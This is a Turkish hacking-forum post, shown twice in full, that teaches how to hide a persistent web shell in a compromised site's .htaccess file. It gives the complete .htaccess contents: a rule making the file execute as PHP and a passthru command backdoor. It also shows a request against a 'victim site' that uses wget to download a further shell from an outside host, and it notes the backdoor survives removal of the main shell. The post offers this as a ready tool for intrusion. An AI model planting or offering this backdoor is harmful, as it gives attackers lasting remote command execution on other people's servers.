Selamün aleyküm,
- Sizlere gizli .htaccess shell oluşturmayı göstereceğim..
- Bu shellin kullanım alanı sizin hayal gücünüz ile sınırlıdır.
- Herhangi bir PHP scriptin en uç noktasına yerleştirip yayabilirsiniz.
- Veya Shell attığınız bir sitenin tenha bir klasörüne bırakabilirsiniz..
- Shelliniz silinse bile .htaccess büyük çoğunlukla silinmiyor.
- Siteye tekrardan shell atabilirsiniz
-#- Kullanım -#-
Kodlar:
[FONT=Courier New, Courier, mono]<Files ~ "^\\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET[cmd]); ?>
[/FONT]
Kodları sitede .htaccess olarak kaydediyoruz.
İşlem bu kadar.
Sonra .htaccess ile basit bir PHP komutu ile shellimizi uzaktan çekebiliriz.
KOD:
Kurbansite.com/.htaccess?cmd=wget -O ShellAdı.php http://www.ShellCekilecekSite.com/shellkodlari.txt
Not : .htaccess ile PHP komutlarını kullanabilirsiniz. Ben sadece Shell atmayı gösterdim.
Misyon dahilinde kullanmanız dileğiyle..
Alinti
- Sizlere gizli .htaccess shell oluşturmayı göstereceğim..
- Bu shellin kullanım alanı sizin hayal gücünüz ile sınırlıdır.
- Herhangi bir PHP scriptin en uç noktasına yerleştirip yayabilirsiniz.
- Veya Shell attığınız bir sitenin tenha bir klasörüne bırakabilirsiniz..
- Shelliniz silinse bile .htaccess büyük çoğunlukla silinmiyor.
- Siteye tekrardan shell atabilirsiniz
-#- Kullanım -#-
Kodlar:
[FONT=Courier New, Courier, mono]<Files ~ "^\\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET[cmd]); ?>
[/FONT]
Kodları sitede .htaccess olarak kaydediyoruz.
İşlem bu kadar.
Sonra .htaccess ile basit bir PHP komutu ile shellimizi uzaktan çekebiliriz.
KOD:
Kurbansite.com/.htaccess?cmd=wget -O ShellAdı.php http://www.ShellCekilecekSite.com/shellkodlari.txt
Not : .htaccess ile PHP komutlarını kullanabilirsiniz. Ben sadece Shell atmayı gösterdim.
Misyon dahilinde kullanmanız dileğiyle..
Alinti
